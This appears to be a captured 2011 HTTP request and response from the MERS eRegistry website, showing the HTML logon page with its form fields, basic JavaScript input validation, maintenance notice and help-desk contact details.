User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.merseregistryonline.org
Cookie: JSESSIONID=1dt587wx31sga
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 21:24:29 GMT
Server: Apache
content-type: text/html; charset=iso-8859-1
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: JSESSIONID=1ik3cf2rslw6e;Path=/eRegistry
content-length: 5109



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<link rel="stylesheet" type="text/css" href="../scripts/e_common.css">
<HEAD>
<META HTTP-EQUIV="PowerSiteData" NAME="SERVERLANGUAGE" CONTENT="Java">
<LINK href="../scripts/e_common.css" type="text/css" rel="stylesheet">
<META content="PB9.0.1.7048" name="GENERATOR">
<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
<SCRIPT language="javascript" src="../scripts/e_callHelp.js" type="text/javascript"></SCRIPT>
<SCRIPT language="JAVASCRIPT">
function inputvalidate() {
if (FORM1.PASSWD.value == "") {
alert ("Please enter a password to logon");
return false;
}
return commonvalidate();
}
function commonvalidate() {
if (FORM1.ORG_ID.value == "") {
alert("Please enter an Organization ID to logon");
return false;
}
if (FORM1.USER_ID.value == "") {
alert("Please enter a User ID to logon");
return false;
}
if (isNaN(FORM1.ORG_ID.value)) {
alert("Please enter a numeric Organization ID to logon");
return false;
}
return true;
}
</SCRIPT>
<SCRIPT language="JAVASCRIPT">
if (top.location == self.location )
{
top.location.href = "e_logonframe.htm";
}
</SCRIPT>
</HEAD>
<BODY language="JAVASCRIPT" onload="FORM1.ORG_ID.focus();" PSPARAMS="">




<BR><BR>
<FORM id="FORM1" name="FORM1" action="e_validatelogon.jsp" method="post" target="_top">
<TABLE class='gap' width="100%" border="0">
<TR>
<TD class="PageHeader2 ctr" align="middle">
MERS<SUP>&reg;</SUP> eRegistry
</TD>
</TR>
<TR>
<TD class='ctr'>
<TABLE class='entry' width='260' border=0>
<TR>
<TH colSpan=2>Please enter your logon credentials below.</TH>
</TR>
<TR>
<TD class=label width='140'>Organization ID:</TD>
<TD><INPUT id=ORG_ID name=ORG_ID size=12 maxLength=7></TD>
</TR>
<TR>
<TD class=label>User ID:</TD>
<TD><INPUT id=USER_ID name=USER_ID size=12 maxLength=8></TD>
</TR>
<TR>
<TD class=label>Password:</TD>
<TD><INPUT id=PASSWD name=PASSWD type=password size=12 maxLength=12></TD>
</TR>
</TABLE>
</TD>
</TR>
<TR><TD>&nbsp;</TD></TR>
<TR>
<TD class='ctr gap' >
<INPUT language="JavaScript" id="loginButton" type="submit" value="Logon" name="LOGONSUBMIT" onclick="return inputvalidate();">
</TD>
</TR>
</TABLE>
<P></P>
<TABLE width="100%">
<TR>
<TD class='ctr'>
<P class='help'>If you have forgotten your password, please enter your Organization ID and User ID and click "Forgot My Password".</P>
</TD>
</TR>
</TABLE>
<P></P>
<TABLE width="100%">
<TR>
<TD class='ctr'>
<INPUT language="JavaScript" value='Forgot My Password' id=forgotButton name=forgotButton type=submit onclick="return commonvalidate();">
</TD>
</TR>
</TABLE>

<TABLE width="100%">
<TR>
<TD class='ctr'>
<P class='help'><br>The 1st and 3rd Sundays of each month are system maintenance windows. <br>The
maintenance window is from 7:00 am to 11:00 pm Eastern Time.</P>
</TD>
</TR>
</TABLE>
</FORM>
<DIV class='NormalPageText ctr gap'>
If you have any questions pertaining to MERS<SUP>&reg;</SUP> eRegistry ,
please contact the MERS Help Desk at 1-888-680-6377<BR>or via
email to
<A href="mailto:eRegistryhelpdesk@mersinc.org">eRegistryhelpdesk@mersinc.org</A>. Please include your name and telephone number with the email.
</DIV>
<DIV class='copyright ctr gap'>
<HR align="center" width="360" SIZE="1"> <B>Copyright&copy; 2004 by
MERSCORP, Inc. 1-800-646-MERS (6377)</B> <BR>Other products or
company names are or may be trademarks <BR>or registered trademarks
and are the property of <BR>their respective holders.
</DIV>
<DIV class='ctr gap'>
<TABLE>
<TR>
<TD class='copyright ctr' width='300'>
<A href="http://www.microsoft.com/windows/ie/default.asp" target="_new"><IMG height="31" src="../images/msie_button.gif" width="88" border="0"> </A>
<BR>MERS Internet Application is best viewed with IE
</TD>
<TD class='copyright ctr' width='300'>
<A href="http://www.eds.com" target="_new"><IMG height="65" src="../images/edslogo.gif" width="109" border="0"> </A>
<BR>Web site created and supported by EDS
</TD>
</TR>
</TABLE>
</BODY>
</HTML>